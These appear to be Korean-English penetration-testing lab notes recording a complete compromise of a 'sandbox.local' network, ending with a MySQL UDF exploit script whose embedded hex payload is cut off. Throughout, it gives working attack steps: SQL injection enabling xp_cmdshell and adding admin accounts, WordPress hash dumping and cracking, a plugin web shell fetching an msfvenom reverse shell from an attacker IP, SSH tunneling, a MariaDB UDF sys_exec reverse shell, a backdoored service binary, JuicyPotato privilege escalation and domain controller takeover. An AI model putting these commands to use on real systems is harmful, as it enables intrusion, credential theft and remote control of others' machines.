7.If 6 works, I can try to enable xp_cmdshell:
▶ 'or 1=1 ; Use master; --
▶ 'or 1=1 ; exec sp_configure 'show advanced options', 1;--
▶ 'or 1=1 ; reconfigure;--
▶ 'or 1=1 ; exec sp_configure 'xp_cmdshell', 1;--
▶ 'or 1=1 ; reconfigure;--
▶ 'or 1=1 ; exec master..xp_cmdshell 'net user OS-94404 password1! /add && net localgroup administrators OS-94404 /add'; --
8.RDP로 로그인 테스트
**** SQL Injection ****
OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"];
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"]; 테이블명 확인
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#"]; 해당 테이블 컬럼 확인
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"]; 유저명 확인
OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#"]; 패스 확인
**** Cracking the password *****
$ john --wordlist=/usr/share/wordlists/rockyou.txt new.txt
**** Plugin payload ****
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ zip cmd.zip plugin-shell.php
**** After uploading & activating New plugin ****
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 -f elf > shell2.elf
$ sudo python3 -m http.server 80
$ curl http://sandbox.local/wp-content/plugins/cmd/plugin-shell.php?cmd=wget%20http://192.168.119.160/shell2.elf
$ curl http://sandbox.local/wp-content/plugins/cmd/plugin-shell.php?cmd=chmod%20%2bx%20shell2.elf
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 443; exploit"
$ curl http://sandbox.local/wp-content/plugins/cmd/plugin-shell.php?cmd=./shell2.elf
**** upload portscan tool ****
$ cat portscan.sh
#!/bin/bash
host=10.5.5.11
for port in {1..65535};
do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done"
meterpreter > upload /home/OS-94404/portscan.sh /tmp/portscan.sh
[*] uploading : /home/OS-94404/portscan.sh -> /tmp/portscan.sh
[*] Uploaded -1.00 B of 151.00 B (-0.66%): /home/OS-94404/portscan.sh -> /tmp/portscan.sh
[*] uploaded : /home/OS-94404/portscan.sh -> /tmp/portscan.sh
meterpreter >
**** SSH tunneling ****
+번외 : 기본 ssh 키 쉐어 +
kali
$ssh-keygen
$cat id_rsa_pub 복사 $ cat id_rsa_pub | xclip -selection clipboard
침투서버 authorized_key로 붙여넣기
-Victim-
/var/www/html/wp-config.php 파일 확인 : mariaDB username, Password & DB IP address(IP확인)
$ mkdir keys
$ cd keys
$ ssh-keygen
> Enter file in which to save the key (/var/www/.ssh/id_rsa): /tmp/key/id_rsa
$ cat id_rsa.pub
-kali-
$ cd /root/.ssh
$ cat authorized_keys
from="10.11.1.250",command="echo 'This account can only be used for port
forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoNVABbMB0Igk2Z+jBrWyUY6ivzRuHAOo0+RZYacce25IvNLAQCLh6UVOKJgyAsaRmIDIGdpGEegMsi70SpNifkZcYTq1k1AVDc5qrLhTmepKK19vcmmg2ckt0E+Yf5QChniRlltUcIF0QebNMuDnON5t2L+Dlbi4rUUGCFwyoly7PoeXVAs6RJ5YeWUdzeeiR+gOFe+QPsGEXr2DmX+R7Z6R4Ujrs83dbT8XgYkt3gAbYtih8sZoBO7thHY9swDDmEOQTSw/iFUDx4PYv0RudREGgMouaSOMHitSSxoe95CwLyEBVng/DnVI0ZpL6/J1JqYJMIPTG0QjbfdTzfsxd www-data@ajla
-Victim-
$ cat tunnel
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa OS-94404@192.168.119.160
-N : specify that we are not runnung any commands
-f : to request ssh to go to the background
-R : address
-Kali -
$ sudo netstat -tulpn
$ mysql --host=127.0.0.1 --port=13306 --user=wp -p
-mariaDB-
> SHOW Grants;
> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
> show variables;
> system clear;
**** mariadb exploit ****
자동화 만들었지만 수동으로 하는 법
1. 모듈 만들기
위 정보를 통해 OS와 DB에 맞는 소스 파일을 컴파일해 .so 모듈을 만든다.
$ git clone https://github.com/mysqludf/lib_mysqludf_sys.git (UDF 모듈 다운) user defined function 사용자 정의 함수
$ cd lib_mysqludf_sys/
$ sudo apt install default-libmysqld-dev (dependencies 설치)
$ rm lib_mysqludf_sys.so
$ cat Makefile (해당 부분 mysql로 되어있으니 바꾼다)
LIBDIR=/usr/lib
Install:
gcc -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
$ make
$ xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex (hex 파일로 만든다)
$ cat lib_mysqludf_sys.so.hex | xclip -selection clipboard
-mariadb-
> set @shell =0x.......; / 64bit shellcode 만들기
> select @@plugin_dir;
> select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';
ERROR 1045 (28000): Access denied for user 'wp'@'%' (using password: YES)
권한 안되서 실패함 > 루트 권한을 탈취해서 DB에 침투해야 한다.
루트에서 루트 mysql비번 탈취 후
$ mysql --host=127.0.0.1 --port=13306 --user=root -p
> set @shell =0x.......;
> select @@plugin_dir
> select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';
> create function sys_exec returns int soname 'udf_sys_exec.so';
> select * from mysql.func where name='sys_exec'
kali에서 python3 -m http.sercer 80 오픈 후
> select sys_exec('wget http://192.168.119.160');
리버스쉘 사용
> select sys_exec('wget http://192.168.119.160/shell.elf');
> select sys_exec('chmod +x ./shell.elf');
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 443; exploit"
> select sys_exec('./shell2.elf');
meterpreter mysqlDB mysql 침투 성공!
번외 : select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh')
whoami
cat /etc/issue
env
ps aux
netstat -plupn
cat /etc/fstab > IP 체크 / ID/pw 체크
ssh -V
ssh-keygen
-kali-
$ cat .ssh/authorized_keys update!
from="10.11.1.250",comm.... 밑에 붙여넣기
from="10.11.1.250",command="echo 'This account can only be used for port
forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDI9XihwZNm0rycJHUqX8iIpNMwsISlqXWDT35yHIO2FJy8wL1umBasD1/BRRymzoEpFI9ywCn6xxLQiivV7Zg0sP5GeZgF5BD43x4Nori7TVipLwseEvdR60iqq+0bF9dPyWyHk+RYR6ObPGyu/znGDFj1N5VM20cf5aHWUVhYvEsv7i0UuZOOylpMgq3v/Uik3778h5C+zjrT2ChKIRViTWHO2V2DOmohapGI8QqZBdxyzEpb9RWAT4Ad5O6vdzLcNpPbAckjCyZ71P1KbGmS7wYhc9jkRy0W0AvMrYOe9WHxd4+JPP4sLkdLs8Yb6NQ7dE= mysql@zora
침투머신
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa OS-94404@192.168.119.160
퍼미션 에러나는 경우 $ sudo tail -f /var/log/auth.log 에서 실패 원인 찾기 (권한, IP오류 등)
칼리에서 $ sudo vi /etc/ssh/sshd_config
칼리
$ sudo vi /etc/proxychains.conf 로 프록시 등록
# proxychains namp --top-ports=20 -sT -Pn
# proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard
d : domain name
u : user name
redirect to clipboard
윈도우 침투 후 절차
백신 툴 돌아가고 있는지 확인
유저 암호 변경해야하니 유저 리스트 확인
1. systeminfo
2. netstat -ano
3. net user /domain alex
4. wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows"
5. services 들어가서 해당 프로그램이 누구 권한으로 돌아가는지 확인
6. 프로그램 write 권한 있는지 확인
> icacls "C:\Puppet"
칼리에서
$ mkdir poultry
$ cd poultry
$ cp /usr/share/windows-resources/binaries/whoami.exe .
$ msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.119.160 LPORT=80 -e x86/shikata_ga_nai -i 9 -f raw > met.bin
# sudo shellter
쉘터 들어가서
mode : A
file path : /home/OS-94404/poultry/whoami.exe
stealth mode: N
payload select : C
payload : /home/OS-94404/poultry/met.bin
dll loader? N
위 파일 보내기
$ sudo python3 -m http.server 80
윈도우에서 explorer 접속해 다운받기
c:User\Alex > move Download\whoami.exe C:\Puppet\Current.exe
새 meterpreter 리스너 생성
> background
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.119.160
> set LPORT 80
> set AutoRunScript post/windows/manage/migrate
> exploit
윈도우 머신 재부팅 해야함
c:> shutdown /r /t 0
재부팅 되면 자동으로 연결됨(getting system shell)
meterpreter> shell
> whoami => nt\system shell
> net user poultryadmin password > 암호 바꾸기
RDP로 새 유저로 침투 가능한지 확인
# proxychains xfreerdp /u:poultryadmin /v:10.5.5.20 +clipboard
-다시 meterpreter-
-attempt to list the domain tokens of any logged in users- (일반적으로 많이 못 찾게 된다)
meterpreter > use incognito
> list_tokens -u (추가 로그인 정보 없을 가능성 있음)
> shell
> cd C:\Users\alex\AppData\Roaming\Thunderbird\Profiles\jbv4ndsh.default-release\Mail.sandbox.local\Inbox
(메일 뒤져보기)
- Internel network enumeration -
c:\>for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up!
검사결과에 gateway 주소도 뜬다. 확인 ipcongif /all
-칼리-
위에서 찾은 IP 포트 스캔 (오래걸림)
$ proxychains nmap --top-ports=1000 -sT -Pn 10.5.5.25,30 --open
Jenkins
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160/whoami.exe', 'c:\Users\Public\whoami.exe');
c:\Users\Public\whoami.exe
$ sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 80; exploit"
whoami
net user jenkinsuser
현 유저 퍼미션 확인 : whoami /priv (SeImpersonatePrivilege)
systeminfo
exit
주시포테이토 업로드
meterpreter > upload /home/OS-94404/cvp/juicypotato.exe c:/Users/Public/JuicyPotato.exe
> background
> exploit
젠킨스에서
Execute concurrent builds if necessary 박스 체크
C:\Users\Public\JuicyPotato.exe -t t -p C:\Users\Public\whoami.exe -l 5837
실패했지만 체크박스 체크한덕에 계속 이전 작업이 실행되어 system 쉘로 붙게 됨
meterpreter> getuid
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token sandbox\\Administrator
== 최종장. 도메인 컨트롤러 탈취하기 ===
> sysinfo
> getuid
> shell
c:> whoami
C:\Windows\system32>net user /domain administrator
1. Host name 찾기
c: nslookup
> set type=all
> _ldap._tcp.dc._msdcs.sandbox.local (호스트네임 확인)
> exit
2. Powershell 열어 Invoke-command 실행 가능한지 확인
c:> powershell
ps> $dcsesh = New-PSSession -Computer SANDBOXDC (위에서 확인한 호스트네임)
ps> Invoke-Command -Session $dcsesh -ScriptBlock {ipconfig}
3. 되면 whoami 공격코드 복사해오기
ps> Copy-Item "C:\Users\Public\whoami.exe" -Destination "C:\Users\Public\" -ToSession $dcsesh
ps> exit
ps> exit
복사 후 새 리스너 기동을 위해 잠시 나갔다가
meterpreter> background
meterpreter> exploit -j
4. 다시 바로 전 세션으로 가서
meterpreter> sessions => system 세션으로 가기
meterpreter> sessions -i 2
meterpreter> shell
5. 카피해온 페이로드 실행
c:system> powershell
ps:> $dcsesh = New-PSSession -Computer SANDBOXDC
ps> Invoke-Command -Session $dcsesh -ScriptBlock {C:\Users\Public\whoami.exe}
새 세션 열림
ctrl + c로 빠져나와 background로 돌린뒤 탈취한 세션들을 살펴보면 마지막 도메인 컨트롤러까지 탈취함.
meterpreter> sessions -l
meterpreter> sessions -i 3
meterpreter> sysinfo
meterpreter> getuid
meterpreter> shell
c:> whoami
> hostname
ta
리눅스 침투 후
1. Check Running Services
$ ps aux
2. System Services
$ systemctl
3. Installed application
$ ls /usr/bin
4. Check running port
$ netstat -tulpn
특별한것 못찾으면 Start looking at Kernel Exploits
mysql UDF python exploit 46249.py
# usage
# 과정 :
# 페이로드 생성 > 코드 수정 > 파이썬 서버 오픈 > meterpreter 오픈 > 코드 실행
# $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 -f elf > shell.elf
# 코드수정
# $ sudo python3 -m http.server 80 > 파일 받아야 하니 준비 시켜두고
# $ sudo msfconsole -q -x "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 443; exploit"
# 코드 실행하면 성공
# 사용법 : $ python 46249.py -u root -pBmDu9xUHKe3fZi3Z7RdMBeb
import sys
import subprocess
import platform, random
import argparse
import os
import re
import pty
shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e7040000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb00000000000000230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d00000300e0010000100000001169690d00000200ea01000000000000040b000008000000b70b000008000000e70b000008000000110c000008000000220c000008000000550c0000080000008e0c000008000000ac0c000008000000d90c00000800000004110000080000006b0a0000020f00007c0a000002030000960a000002020000ad0a000002090000430b000002090000bc0a0000020c0000e40a0000020e0000f30a0000020e00003f0c0000020e00000e0b000002010000310b000002060000560b0000020a0000680b000002120000bf0b0000020d0000ef0b0000020d00005b0c0000020d0000960c0000020d0000b20c0000020d0000e10c0000020d0000fd0c000002080000580d000002110000770d0000020b00008e0d000002070000e410000006040000e810000006050000ec10000006100000fc1000000704000000110000071000005589e55383ec04e8000000005b81c3d40700008b93f4ffffff85d27405e81e000000e8b9000000e884040000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff5589e55653e8ad00000081c37607000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8bcffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c3f706000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35531c089e55dc35589e55dc35589e557565383ec0cfc83c9ff8b750c8b46088b3831c0f2aef7d18d59ffe8fcffffff83f8007c53753f83ec0c6a1ee8fcffffff5f596a006a00486a218d1418f7d06a0721d0506a00e8fcffffff83c42083f8ff89c7742351538b4608ff3057e8fcffffffffd7eb0b526a016a0050e8fcffffff31c083c410eb05b8010000008d65f45b5e5f5dc35589e557565383ec18fc6800040000e8fcffffffc70424010000008945e8e8fcffffffc6000089c68b450c595b31db68840e00008b4008ff30e8fcffffff8945eceb338b7de831c083c9fff2ae5252f7d18d79ff8d043b50568945f0e8fcffffff83c40c57ff75e889c68d041850e8fcffffff8b5df083c40cff75ec6a04ff75e8e8fcffffff83c41085c075b683ec0cff75ece8fcffffff83c410803e0075088b4518c60001eb16c6441eff0031c083c9ff89f7f2ae8b4514f7d14989088d65f489f05b5e5f5dc35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e55383ec048b550c8b5d10833a0274095050683f0e0000eb428b420483380074095050685e0e0000eb318b520c83ec0cc74004000000008b0283c00203420450e8fcffffff8b550883c41089420c31d285c07512505068860e000053e8fcffffffb20183c41088d08b5dfcc9c35589e583ec088b450c83380175128b4004833800750a8b4508c6000131c0eb14505068140e0000ff7510e8fcffffffb00183c410c9c35589e55383ec0c8b5d1068a00e000053e8fcffffff8b4514c7001e00000089d88b5dfcc9c35531d289e583ec088b450c8338007414525268bf0e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec148b450c8b4008ff30e8fcffffffc999c35589e557565383ec10fc8b550c8b45088b580c8b420c89df8b088d440b018945e88b42088b30f3a48b420c8b00c60403008b42088b4a0c8b7de88b70048b4904f3a48b420c8b55e88b4004c60402006a015253e8fcffffff8d65f45b5e5f5d99c35589e58b45088b400c85c074098945085de9fcffffff5dc35589e55783ec10fc8b450c8b4008ff30e8fcffffff83c41085c089c275088b4518c60001eb1131c083c9ff89d7f2ae8b4514f7d149890889d08b7dfcc9c390909090905589e55653e85dfcffff81c3260300008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c3ec020000e860fbffff595bc9c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000b20100000c000000100900000d000000f80d000004000000b4000000f5feff6ff8010000050000005805000006000000b80200000a000000f40100000b0000001000000003000000f010000002000000100000001400000011000000170000000009000011000000e0070000120000002001000013000000080000001600000000000000feffff6fa0070000ffffff6f01000000f0ffff6f4c070000faffff6f0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000b4000000b400000044010000030000000000000004000000040000000b000000f6ffff6f02000000f8010000f8010000c000000003000000000000000400000004000000150000000b00000002000000b8020000b8020000a0020000040000000100000004000000100000001d00000003000000020000005805000058050000f40100000000000000000000010000000000000025000000ffffff6f020000004c0700004c070000540000000300000000000000020000000200000032000000feffff6f02000000a0070000a00700004000000004000000010000000400000000000000410000000900000002000000e0070000e007000020010000030000000000000004000000080000004a0000000900000002000000000900000009000010000000030000000a0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004e000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005f0000000100000006000000f80d0000f80d00001c00000000000000000000000400000000000000650000000100000032000000140e0000140e0000dd000000000000000000000001000000010000006d0000000100000002000000f40e0000f40e00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007e000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008a00000006000000030000001410000014100000d000000004000000000000000400000008000000930000000100000003000000e4100000e41000000c00000000000000000000000400000004000000980000000100000003000000f0100000f01000001400000000000000000000000400000004000000a1000000010000000300000004110000041100000400000000000000000000000400000000000000a7000000080000000300000008110000081100000800000000000000000000000400000000000000ac000000010000000000000000000000081100009b0000000000000000000000010000000000000001000000030000000000000000000000a3110000b500000000000000000000000100000000000000";
shellcode_x64 = "7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdfff